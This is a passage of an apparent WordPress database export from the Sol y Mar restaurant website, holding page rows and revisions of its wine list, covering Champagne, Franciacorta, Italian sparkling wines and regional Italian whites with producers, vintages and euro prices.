left\">  Ettore Germano                    Alta Langa brut D.O.C.                                                                 € 30</p>\r\n<p style=\"text-align: left\">   Coppo                                    Luigi Coppo Brut                                                                            € 30</p>\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong><u></u>\r\n\r\nCantine Montagna             Pinot nero v.i.b. Oltrepò Pavese D.O.C.                                       € 18\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino - Alto Adige</u></strong>\r\n\r\nRevì                                       Trento D.O.C. Dosaggio Zero                                                       € 32\r\n\r\nLetrari (Talento)                   Trento D.O.C. Brut                                                                       € 28\r\n\r\nTrento D.O.C. dosaggio zero                                                       € 35\r\n\r\nFerrari                                      Perlè Trento D.O.C Brut                                                               € 45\r\n\r\nCantina Furlani                      Furlani Brut                                                                                    € 22\r\n\r\nCantina Furlani                      Furlani Brut Nature                                                                      € 22\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Veneto</u></strong><u></u>\r\n\r\nCampofalco Biologico             Prosecco Valdobbiadene D.OC.G                                              € 19\r\n\r\nAdami                                         Prosecco Valdob. D.O.C.G. Brut Bosco di Giga                      € 20\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Le mille e una bollicina','','publish','closed','closed','','francia-champagne','','','2020-10-24 23:06:34','2020-10-24 21:06:34','',22,'http://www.ristorantesolymar.it/?page_id=75',4,'page','',0),(76,1,'2015-08-03 14:45:33','2015-08-03 12:45:33','<strong><u>Francia  Champagne….…………………………………………………………..</u></strong>\r\n\r\n<strong>I blanc  de blancs</strong>\r\n\r\nAgrapart &amp; fils             Terroirs Ex. Brut  Grand Cru Avize                       €     60,00<strong><u>                                                  </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nUlysse Collin               Les Pierrieres  Ex.brut  rm Congy                             €     70,00\r\n\r\nLes Roises extra brut   rm    Congy                          €     73,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPascal Doquet            Brut grand cru     Mesnil sur Oger                               €    50,00\r\n\r\nBrut grand cru 1996   Mesnil sur Oger                       €    83,00\r\n\r\n&nbsp;\r\n\r\nBonnet Gilmert           Cuvee de reserve Brut Grand cruc 0,375m  Oger    €    21,00\r\n\r\nCuvee de reserve Brut Grand Cru  Oger                  €    40,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPierre Gimonnet          Cuvee  1er cru  brut Cuis                                           €    42,00\r\n\r\n&nbsp;\r\n\r\nDavid Léclapart          L’artiste pas dose 1er cru  (biodinamico) Trépail                       €   105,00\r\n\r\n&nbsp;\r\n\r\nR &amp; L Legras              Brut Grand  Crù  Chouilly                                          €     50,00\r\n\r\nSaint Vincent  Grand cru Mill  “96 Chouilly            €   120,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPierre Péters              Le Chétillons cuvee special ‘05 brut g.c. Mesnil s.O.     €   72,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nJacques Selosse         Initial Grand Cru  brut    Avize                                  €   130,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDiebolt Vallois           Brut Mill”06 Cramant                                                  €    55,00\r\n\r\nFleur de Passion brut 04 Cramant                            €    95,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\nVouette &amp; Sorbée        Blanc d’Argile Ex.Brut. Buxieres sur Arce             €     75,00\r\n\r\n&nbsp;','Francia Champagne','','inherit','open','open','','75-revision-v1','','','2015-08-03 14:45:33','2015-08-03 12:45:33','',75,'http://www.ristorantesolymar.it/2015/08/03/75-revision-v1/',0,'revision','',0),(77,1,'2015-08-03 14:48:02','2015-08-03 12:48:02','<p style=\"text-align: center\"><strong>Franciacorta</strong></p>\r\n&nbsp;\r\n<p style=\"text-align: left\"><strong>     </strong>Faccoli                            Brut D.O.C.G                                                               € 30,00</p>\r\n<p style=\"text-align: left\">     Majolini<strong>                         </strong>Satèn millesimato D.O.C.G                                      € 30,00</p>\r\n<p style=\"text-align: left\">     Monterossa                     P.R. Brut blanc de blancs                                         € 32,00</p>\r\n<p style=\"text-align: left\">      Cabochon                       Brut millesimo                                                            € 65,00</p>\r\n<p style=\"text-align: left\">      Il Mosnel                        Extra Brut millesimato D.O.C.G                              € 38,00</p>\r\n<p style=\"text-align: left\">                                               Pas dosè D.O.C.G                                                         € 27,00</p>\r\n<p style=\"text-align: left\">       Villa                                Brut rosé millesimato D.O.C.G                                 € 32,00</p>\r\n<p style=\"text-align: left\">                                               Saten millesimato D.O.C.G                                        € 30,00</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong><u>Sud Africa</u></strong></p>\r\n<strong><u> </u></strong>\r\n\r\nPongracz                   Metodo classico brut da chardonnay e pinot nero                     € 28,00\r\n\r\n<strong><u> </u></strong>','Franciacorta','','publish','closed','open','','i-blanc-de-noir','','','2020-10-24 23:10:41','2020-10-24 21:10:41','',22,'http://www.ristorantesolymar.it/?page_id=77',6,'page','',0),(78,1,'2015-08-03 14:48:02','2015-08-03 12:48:02','Bereche et fils            Rive Gauche ext. Brut  100% meunier Mareuil-le-port     €     65,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nNathalie Falmet        Le Val Cornet brut Rouvres les Vignes                      €    55,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFleury Pere &amp; Fils     Brut nm (biologico) Courteron                                     €    50,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nEgly-Ouriet                 “Les Vignes de Vrigny”Brut 1er cru (100%meunier). rm   €   60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nJéròme Prévost            La Closerie  extra brut Gueux                             €     75,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nChartogne-Taillet      Les Barres (biodinamico)ext.brut.(100% meunier)”08 Merfy   €   73,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVouette &amp; Sorbée        Fidèle extra brut  (biologico) Buxieres sur Arce      €    63,00\r\n\r\n&nbsp;','I blanc de noir','','inherit','open','open','','77-revision-v1','','','2015-08-03 14:48:02','2015-08-03 12:48:02','',77,'http://www.ristorantesolymar.it/2015/08/03/77-revision-v1/',0,'revision','',0),(79,1,'2015-08-03 15:06:51','2015-08-03 13:06:51','<p style=\"text-align: center\"><em><strong><u>I Blanc de Blancs</u></strong></em></p>\r\nAgrapart &amp; fils                            Terroirs Ex. Brut Grand Cru Avize                                    € 80,00\r\n\r\nUlysse Collin                               Les Pierrieres Extra Brut rm Congy                                  € 90,00\r\n\r\nPascal Doquet                             Brut   Diapason     Mesnil sur Oger                                   € 62,00\r\n\r\nBrut grand cru  Mesnil sur Oger                                        € 85,00\r\n\r\nBonnet Gilmert                           Cuvee de reserve Brut Grand Cru Oger                            € 45,00\r\n\r\nPierre Gimonnet                         Cuvee 1er cru brut Cuis                                                        € 42,00\r\n\r\nDavid Léclapart                           L’artiste pas dose 1er cru (biod.) Trépail                         € 105,00\r\n\r\nR &amp; L Legras                                Brut Grand Crù Chouilly                                                      € 50,00\r\n\r\nSaint Vincent Grand cru Mill Chouilly                             € 120,00\r\n\r\nDiebolt Vallois                             Brut Mill   Cramant                           “11                              € 60,00\r\n\r\nFleur de Passion Brut Cramant         “07                          € 120,00\r\n\r\nVouette &amp; Sorbée                        Blanc d’Argile Extra Brut Buxieres sur Arce                   € 80,00','Francia Champagne','','publish','closed','open','','champagne-assemblaggi','','','2020-09-26 22:17:52','2020-09-26 20:17:52','',22,'http://www.ristorantesolymar.it/?page_id=79',8,'page','',0),(80,1,'2015-08-03 15:06:51','2015-08-03 13:06:51','Agrapart &amp; fils            7 crus brut     Avize                                                   €     52,00\r\n\r\n&nbsp;\r\n\r\nL.Aubry Fils                   Aubry 1er cru. brut rm Jouy-les-Reims                      €     38,00\r\n\r\nCuvée  de Humbert P.C. brut “06 Jouy-les-Reims                   €     70,00\r\n\r\n&nbsp;\r\n\r\nAndré Beaufort           Brut  mill.2005      Polisy                                           €    64,00\r\n\r\n&nbsp;\r\n\r\nBereche et fils            Brut reserve Craon de Ludes                                       €     42,00                                                                     Reflet d’Antan brut Craon de Ludes                        €     90,00\r\n\r\n&nbsp;\r\n\r\nEmmanuel Brochet   Le Mont Benoit extra brut Villers-aux-Noeuds         €    45,00\r\n\r\n&nbsp;\r\n\r\nRoger Brun                 Brut Reserve à Ay                                                                      €    40,00\r\n\r\nCuvèe des Sires brut Gran Cru, 2006 Ay                     €    65,00\r\n\r\n&nbsp;\r\n\r\nCorbon                        Brut Prestige rm   Avize                                                €    56,00\r\n\r\nBrut D’autrefois rm Avize                                             €  100,00\r\n\r\n&nbsp;\r\n\r\nLaherte Frères              Ultradition Brut Epernay    0,375 ml                        €    22,00\r\n\r\nUltradition Brut Epernay    0,750 ml                        €  42,00\r\n\r\n&nbsp;\r\n\r\nGosset-Brabant<strong>                  </strong>Reserve grand cru brut nature<strong>  </strong>Ay                              €  45,00<strong>  </strong>\r\n\r\n<strong>                         </strong>\r\n\r\nJaquesson &amp;fils          Cuvee n°737 Brut Dizy                                                 €    63,00\r\n\r\n&nbsp;\r\n\r\nBenoït Lahaye           Brut Grand Cru Essentiel rm    Bouzy                                    €    42,00\r\n\r\nBrut Naturessense rm     Bouzy                                   €    60,00\r\n\r\nViolaine (senza solforosa aggiunta) Bouzy                €    88,00\r\n\r\n&nbsp;\r\n\r\nGeorges  Laval          Brut nature 1er cru Cumieres                                       €     68,00\r\n\r\n&nbsp;\r\n\r\nMarie-Noelle Ledru                Brut Grand.Cru mill, 2009  Ambonnay                     €     55,00\r\n\r\nBrut Grand Cru Nature mill. 2006 Ambonnay         €     70,00\r\n\r\n&nbsp;\r\n\r\nMarguet                       Cuvée reserve grand cru  Ambonnay                        €   45,00\r\n\r\n&nbsp;\r\n\r\nEgly-Ouriet                 Brut Tradition Grand Cru rm Ambonnay                 €   68,00\r\n\r\n&nbsp;\r\n\r\nPalmer                             Brut Reserve Reims                                                    €  50,00\r\n\r\nFranck Pascal             Reliance brut nature (biologico,biodinamico) Baslieux         €    60,00\r\n\r\n&nbsp;','Champagne - Assemblaggi','','inherit','open','open','','79-revision-v1','','','2015-08-03 15:06:51','2015-08-03 13:06:51','',79,'http://www.ristorantesolymar.it/2015/08/03/79-revision-v1/',0,'revision','',0),(81,1,'2015-08-03 15:08:06','2015-08-03 13:08:06','<p style=\"text-align: center\"><em><strong>  <u><span style=\"color: #47425d\">Assemblaggi</span></u></strong></em></p>\r\n<strong> </strong>Philipponnat                  Royale Reserve non dose Mareuil-sur-Ay                 (NO)                      € 55,00\r\n\r\nMoet et Chandon           Dom Perignon Vintage Epernay                          (NO)                            € 200,00\r\n\r\nKrug                                  Grande Cuveè                                                                  (NO)                     € 190,00\r\n\r\nMarguet                            Shaman 14 Grand Cru (biodinamico)                        (NO)                     € 65,00\r\n\r\nPierre Gerbais                 Grains de Celle Extra Brut                                                                          € 45,00\r\n\r\nJean Paul Deville            Carte Noir Brut Verzy                                                                                  € 40,00\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong><em><u>Rosè</u></em></strong></p>\r\nLamiable                            Brut rosé grand cru                                                                                      € 50,00\r\n\r\nPascal Doquet                   Brut 1°ers cru Mesnil sur Oger                                                                  € 62,00\r\n\r\nLaurent-Perrier                Cuvée Rosé Tours Sur Marne                                                                     € 70,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Assemblaggi','','publish','closed','closed','','assemblaggi-e-rose','','','2020-09-26 22:53:26','2020-09-26 20:53:26','',22,'http://www.ristorantesolymar.it/?page_id=81',11,'page','',0),(82,1,'2015-08-03 15:08:06','2015-08-03 13:08:06','Philipponnat              Royale Reserve non dose Mareuil-sur-Ay                 €    46,00                                                       Clos des Goisses brut “04  Mareuil-sur-Ay                 €   150,00\r\n\r\nPommery                     Cuvée Louise 1999 brut   Ay                                       €   130,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMoet et Chandon       Dom Perignon Vintage “04 Epernay                            €   145,00\r\n\r\n&nbsp;\r\n\r\nSavart                          L’Accomplie P.Cru brut   Ecueil                                   €    45,00\r\n\r\n&nbsp;\r\n\r\nVilmart &amp; C                 Grand reserve brut 1er cru Rilly-la-Montagne         €     44,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong> </strong>\r\n\r\n<strong>I Rosè</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nBonnet Gilmert           Brut rosé de saignée grand cru            Oger                      €    47,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGeorges  Laval           Cumieres 1er cru  brut nature rm                             €     90,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPascal Doquet            Brut 1°ers cru Mesnil sur Oger                                €    50,00','Assemblaggi e Rosè','','inherit','open','open','','81-revision-v1','','','2015-08-03 15:08:06','2015-08-03 13:08:06','',81,'http://www.ristorantesolymar.it/2015/08/03/81-revision-v1/',0,'revision','',0),(83,1,'2015-08-03 15:09:35','2015-08-03 13:09:35','<strong><u>   Piemonte</u></strong>\r\n\r\nGaja                                Rossj-Bass Chardonnay “18                                                    € 60,00\r\n\r\nEttore Germano           Hèrzu Langhe Bianco doc Riesling  “17                                € 24,00\r\n\r\nCeretto                           Blangè Arneis D.O.C ’17 .                                                         € 22,00\r\n\r\nCoppo                             Monteriolo Chardonnay D.O.C. ‘17                                       € 34,00\r\n\r\nAzienda Agricola          Ghiomo   Ghiomo Imprimis ‘17                                              € 19,00\r\n\r\nBellotti Bianco              Semplicemente Vino ‘18                                                           € 18,00\r\n\r\nVigneti Massa                Derthona ’17                                                                               € 24,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Liguria</u></strong>\r\n\r\nStefano Legnani              Bamboo Road bianco non filtrato      ‘16                               € 20,00\r\n\r\nStefano Legnani              Ponte di Toi bianco non filtrato ‘16                                        € 23,00\r\n\r\nBio Vio                              Pigato di Albenga D.O.C.                                                           € 23,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong>\r\n\r\nCà dei Frati                      Brolettino D.O.C. ‘18                                                                € 19,50\r\n\r\nTenuta Belvedere           Wai I.G.T. ‘17                                                                             € 18,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Piemonte','','publish','closed','closed','','emilia-romagna-val-daosta','','','2020-10-24 23:17:37','2020-10-24 21:17:37','',22,'http://www.ristorantesolymar.it/?page_id=83',13,'page','',0),(84,1,'2015-08-03 15:09:35','2015-08-03 13:09:35','<u>I VINI BIANCHI ITALIANI</u>\r\n\r\n<strong><u>Emilia Romagna………………………………………………………………….</u></strong>\r\n\r\nTenuta S.Lucia           Famous Rubicone igt(uve famoso) “12                      € 19,00\r\n\r\nTenuta La Palazza     Tornese Chardonnay igt “13                                          €  18,50\r\n\r\nPoderi del Nespoli      Pagadebit di Romagna doc “14                                      €  14,00\r\n\r\nTre Monti                         Ciardo Chardonnay colli di Imola doc “12                   €  17,50\r\n\r\nSono Chardonnay senza solfiti igp”13                         €  15,00\r\n\r\n&nbsp;\r\n\r\nSan Patrignano                        Aulente igt “14                                                                  €  15,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Valle d’Aosta…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nLes Cretes                                   Chardonnay Cuvèe Bois doc “11                                              €  42,00\r\n\r\nPetite Arvine doc “14                                                       €  21,00\r\n\r\n&nbsp;\r\n\r\nPavese Ermes                Blanc de Morgex et de la Salle dop “14            €  18,50','Emilia Romagna / Val D\'Aosta','','inherit','open','open','','83-revision-v1','','','2015-08-03 15:09:35','2015-08-03 13:09:35','',83,'http://www.ristorantesolymar.it/2015/08/03/83-revision-v1/',0,'revision','',0),(85,1,'2015-08-03 15:10:54','2015-08-03 13:10:54','<strong><u> Trentino Alto Adige</u></strong>\r\n\r\nHartmann Donà              Donà Blanc I.G.T.                                        “11 € 27,0o\r\n\r\nKossler                             Gewurztraminer D.O.C.                              “18 € 20,00\r\n\r\nGirlan                               Gewurztraminer D.O.C.                             “18 € 20,00\r\n\r\nMichele Appiano           Sauvignon St Valentin D.O.C.                   “17 € 32,00\r\n\r\nGewurztraminer St Valentin D.O.C.        “17 € 32,00\r\n\r\nFalkenstein                     Riesling D.O.C.                                                “16 € 24,00\r\n\r\nPinot Bianco D.O.C.                                        “16 € 22,00\r\n\r\nSauvignon D.O.C.                                            “16 € 23,00\r\n\r\nPeter Dipoli                      Voglar Sauvignon D.O.C.          (NO)            “15 € 26,00\r\n\r\nFranz Haas                      Manna Vigneti delle dolomiti I.G.T. (NO) “17 € 26,00\r\n\r\n<strong><u>   Veneto</u></strong>\r\n\r\nInama                               Vulcaia Fumè Sauvignon IGT                     “16 € 36,00\r\n\r\nGiovanni Menti               Riva Arsiglia                                                     “16 € 22,00\r\n\r\nCostadilà Bianco             330 SLM non filtrato Costadilà                      € 21,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Trentino Alto Adige','','publish','closed','closed','','friuli-venezia-giulia','','','2020-10-24 23:20:19','2020-10-24 21:20:19','',22,'http://www.ristorantesolymar.it/?page_id=85',14,'page','',0),(86,1,'2015-08-03 15:10:54','2015-08-03 13:10:54','<strong><u>Friuli Venezia Giulia……………………………………………………..</u></strong>\r\n\r\n<strong> </strong>Primosic                               Ribolla Gialla Venezia Giulia igt “14               €  18,00\r\n\r\n&nbsp;\r\n\r\nRonco dei tassi                     Friulano dop (tocai) “ 14                                  €  19,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLe due Terre                             Sacrisassi cof doc                                            €  30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nScubla                                        Bianco Pomedes CoF doc “11                              €  27,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVie di Romans                          Chardonnay Isonzo doc “13                                €  26,00\r\n\r\nVieris Sauvignon Isonzo doc “13                       €  28,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLis Neris                               B.B.K. (ribolla da collio sloveno)               €  18,50\r\n\r\nLis Bianco igt “09                                                        €  28,50\r\n\r\nGris Pinot Grigio Doc“12                                     €  23,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDamijan Podversic                 Malvasia istriana igt Venezia Giulia”10        €  34,00\r\n\r\nRibolla gialla igt Venezia Giulia”10                €  34,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVenica                                   Sauvignon Ronco delle Mele doc “14                €  39,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nJermann                               Vintage Tunina bianco Venezia G. igt “12      €  42,00','Friuli Venezia Giulia','','inherit','open','open','','85-revision-v1','','','2015-08-03 15:10:54','2015-08-03 13:10:54','',85,'http://www.ristorantesolymar.it/2015/08/03/85-revision-v1/',0,'revision','',0),(87,1,'2015-08-03 15:41:56','2015-08-03 13:41:56','<strong><u>   SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Friuli Venezia Giulia……………………………………………………..</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nSkerk                                Vitovska I.G.T. Venezia Giulia                         € 29,00\r\n\r\n&nbsp;\r\n\r\nRonco dei tassi                 Friulano D.O.P. (tocai)                               “17   € 20,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVie di Romans                     Chardonnay Isonzo D.O.C.                               “17   € 28,00\r\n\r\nSauvignon Isonzo D.O.C.                                  “16   € 28,00\r\n\r\n&nbsp;\r\n\r\nLis Neris                        Lis Bianco I.G.T.                                               “15   € 29,00\r\n\r\n&nbsp;\r\n\r\nGris Pinot Grigio D.O.C.                                    “16   € 23,00\r\n\r\n&nbsp;\r\n\r\nDamijan Podversic           Ribolla gialla I.G.T. Venezia Giulia            “14 € 36,00\r\n\r\n&nbsp;\r\n\r\nMalvasia istriana I.G.T. Venezia Giulia      “14   € 36,00\r\n\r\n&nbsp;\r\n\r\nVenica                               Sauvignon Ronco delle Mele D.O.C.                “17 € 39,00\r\n\r\n&nbsp;\r\n\r\nJermann                           Vintage Tunina bianco Venezia G. I.G.T.     “16 € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Friuli Venezia Giulia','','publish','closed','closed','','marche-toscana-umbria','','','2020-09-26 22:40:53','2020-09-26 20:40:53','',22,'http://www.ristorantesolymar.it/?page_id=87',15,'page','',0),(88,1,'2015-08-03 15:41:56','2015-08-03 13:41:56','<strong><u>Marche………………………………………………………………….</u></strong>\r\n\r\n<u> </u>\r\n\r\nMarotti Campi           Albiano Verdicchio dei Castelli di Jesi classico doc “13         €  9,50\r\n\r\n&nbsp;\r\n\r\nCollestefano               Verdicchio di Matelica doc “14                                       € 14,50\r\n\r\n&nbsp;\r\n\r\nLa Monacesca           Verdicchio di Matelica doc “13                                         € 17,50\r\n\r\nUmani Ronchi          Casal di Serra Verdicchio Classico Sup. “13                 € 18,00\r\n\r\nBucci                           Bucci Verdicchio C.d.J. Classico Sup. Doc  “13          € 17,50\r\n\r\nVilla Bucci Verdicchio CdJ Classico Ris.Doc “10 € 39,00\r\n\r\n&nbsp;\r\n<ol>\r\n	<li>San Lorenzo Le Oche verdicchio CdJ classico doc “13                   € 16,00                                                                                                                                        .                                        Campo delle Oche verdicchio CdJ classico sup doc    € 21,00</li>\r\n</ol>\r\n&nbsp;\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>Toscana…………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nTunia                         Chiarofiore Toscana bianco igt   “ 12                               €  21,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>Umbria…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nAntinori\r\n\r\n&nbsp;\r\n\r\nCastello della Sala    Cervaro della Sala Umbria igt  “12                              € 45,00\r\n\r\n&nbsp;','Marche, Toscana, Umbria','','inherit','open','open','','87-revision-v1','','','2015-08-03 15:41:56','2015-08-03 13:41:56','',87,'http://www.ristorantesolymar.it/2015/08/03/87-revision-v1/',0,'revision','',0),(89,1,'2015-08-03 15:43:02','2015-08-03 13:43:02','<u>SOL Y MAR</u>\r\n\r\n<u> </u>\r\n\r\n<strong><u>     Marche………………………………………………………………….</u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\nMarotti Campi     Albiano Verdicchio dei Cast. di Jesi classico D.O.C. “17    €10,00\r\n\r\n&nbsp;\r\n\r\nCollestefano         Verdicchio di Matelica D.O.C.                                        “18   € 16,00\r\n\r\n&nbsp;\r\n\r\nLa Monacesca       Verdicchio di Matelica D.O.C.                                         “17  € 18,00\r\n\r\n&nbsp;\r\n<ol>\r\n 	<li>San Lorenzo   Le Oche Verdicchio CdJ classico D.O.C.   (NO)    “17 € 19,00</li>\r\n</ol>\r\nCampo delle Oche verdicchio CdJ class. sup D.O.C. (NO) “14 € 24,00\r\n\r\nAzienda Agricola Fiorano   Donna Orgilla (bio)                                          “17 € 19,00\r\n\r\nVigneti Vallorani   Avora   Falerio D.O.C. (bio)                                              “17 € 17,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Toscana…………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nTunia                            Chiarofiore Toscana bianco I.G.T.                          “13   € 21,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Abruzzo……………………………………….……………………………..</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nEmidio Pepe                  Trebbiano D’Abruzzo D.O.C.                               “15 € 50,00\r\n\r\nEmidio Pepe                 Pecorino Colli Aprutini IGT                            “17 € 50,00\r\n\r\n&nbsp;\r\n\r\nMasciarelli                     Marina Cvetic Treb.d’Abruzzo ris. D.O.C.          “15 € 35,00\r\n\r\n&nbsp;\r\n\r\nFrancesco cirelli            Trebbiano d’Abruzzo D.O.C. “bio”                 “16 € 16,00\r\n\r\n&nbsp;\r\n\r\nTrebbiano d’Abruzzo D.O.C. anfora“bio”       “17 € 27,00\r\n\r\n&nbsp;\r\n\r\nValentini                        Trebbiano d’Abruzzo D.O.C.                               “15 € 90,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Marche','','publish','closed','closed','','abruzzo-campania','','','2020-09-26 22:41:00','2020-09-26 20:41:00','',22,'http://www.ristorantesolymar.it/?page_id=89',16,'page','',0),(90,1,'2015-08-03 15:43:02','2015-08-03 13:43:02','<strong><u>Abruzzo……………………………………….……………………………..</u></strong>\r\n\r\n<strong> </strong>\r\n\r\nEmidio Pepe               Trebbiano D’Abruzzo doc “12                                        €  29,00\r\n\r\n&nbsp;\r\n\r\nMasciarelli                  Marina Cvetic Trebbiano d’Abruzzo ris.doc “11       €  32,00\r\n\r\n&nbsp;\r\n\r\nValentini                     Trebbiano d’Abruzzo  doc  “12                                      €  65,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Campania……………………………………….……………………………..</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDi Prisco                               Coda di volpe Irpinia Doc  “13                        €  14,00\r\n\r\nGreco di tufo Docg  “13                                    €  16,50\r\n\r\nFiano di Avellino Docg  “ 12                            €  16,50\r\n\r\n&nbsp;\r\n\r\nVilla Matilde                          Falanghina Rocca Monfina igp “14                   €  15,50\r\n\r\n&nbsp;\r\n\r\nCantina dell’Angelo              Greco di Tufo docg “13                                          €  19,00\r\n\r\n&nbsp;\r\n\r\nCiro Picariello                     Fiano di Avellino docg                                         €  20,00\r\n\r\nFerrara Benito                    Vigna Cicogna Greco di tufo docg “14               €  21,00\r\n\r\n&nbsp;\r\n\r\nIl Tufiello                             Don Chisciotte Fiano igt “12                               €  23,50\r\n\r\n(vino biodinamico)\r\n\r\n&nbsp;\r\n\r\nMarisa Cuomo                    Costa di Amalfi furore Doc  “ 14          €  21,00\r\n\r\nFiorduva Furore Bianco Amalfi  doc “12  €  37,00\r\n\r\n&nbsp;','Abruzzo, Campania','','inherit','open','open','','89-revision-v1','','','2015-08-03 15:43:02','2015-08-03 13:43:02','',89,'http://www.ristorantesolymar.it/2015/08/03/89-revision-v1/',0,'revision','',0),(91,1,'2015-08-03 15:43:43','2015-08-03 13:43:43','<strong><u>    SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Puglia…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGreco Bianco           salento 141   Archetipo                                     “ 17      € 17,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Campania……………………………………….……………………………..</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nBajola                               Bianco (non filtrato non chiarificato)             “15    € 27,00\r\n\r\n&nbsp;\r\n\r\nCantina dei Monaci     Beneventano Falanghina I.G.T.                 “18     € 16,00\r\n\r\n&nbsp;\r\n\r\nCantina dell’Angelo       Greco di Tufo D.O.C.G.                                       “16     € 19,00\r\n\r\n&nbsp;\r\n\r\nCiro Picariello               Fiano di Avellino D.O.C.G.                (NO)         “18    € 21,00\r\n\r\n&nbsp;\r\n\r\nFerrara Benito              Vigna Cicogna Greco di tufo D.O.C.G.             “18   € 23,00\r\n\r\n&nbsp;\r\n\r\nIl Tufiello                     Don Chisciotte Fiano I.G.T.  (biod.)                “16 € 24,00\r\n\r\n&nbsp;\r\n\r\nMarisa Cuomo             Costa di Amalfi furore D.O.C.                     “17 € 22,00\r\n\r\n&nbsp;\r\n\r\nFiorduva Furore Bianco Amalfi D.O.C.           “16 € 60,00\r\n\r\n&nbsp;\r\n\r\nLuigi Maffini                   Kratos Fiano Cilento D.O.P.                             “16 € 19,00\r\n\r\nPietraincatenata Fiano Cilento D.O.P.             “15 € 25,00\r\n\r\n&nbsp;\r\n\r\nQuintodecimo                 Exultet Fiano di Avellino D.O.C.G.                     “17 € 45,00\r\n\r\n&nbsp;\r\n\r\nCantina Morone             Falanghina Monaci                                                 “17 € 16,00','Puglia','','publish','closed','closed','','sicilia-sardegna','','','2020-09-26 22:41:08','2020-09-26 20:41:08','',22,'http://www.ristorantesolymar.it/?page_id=91',17,'page','',0),(92,1,'2015-08-03 15:43:43','2015-08-03 13:43:43','<strong><u>Sicilia…………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nDonnafugata              La Fuga Chardonnay Entellina “13                             € 19,50\r\n\r\nChiarandà chardonnay Entellina dop “10                  € 32,00\r\n\r\n&nbsp;\r\n\r\nGraci                            Etna bianco doc “12                                            € 19,00\r\n\r\n&nbsp;\r\n\r\nSalvatore Murana     Gadì Bianco di Pantelleria Doc “ 11                    € 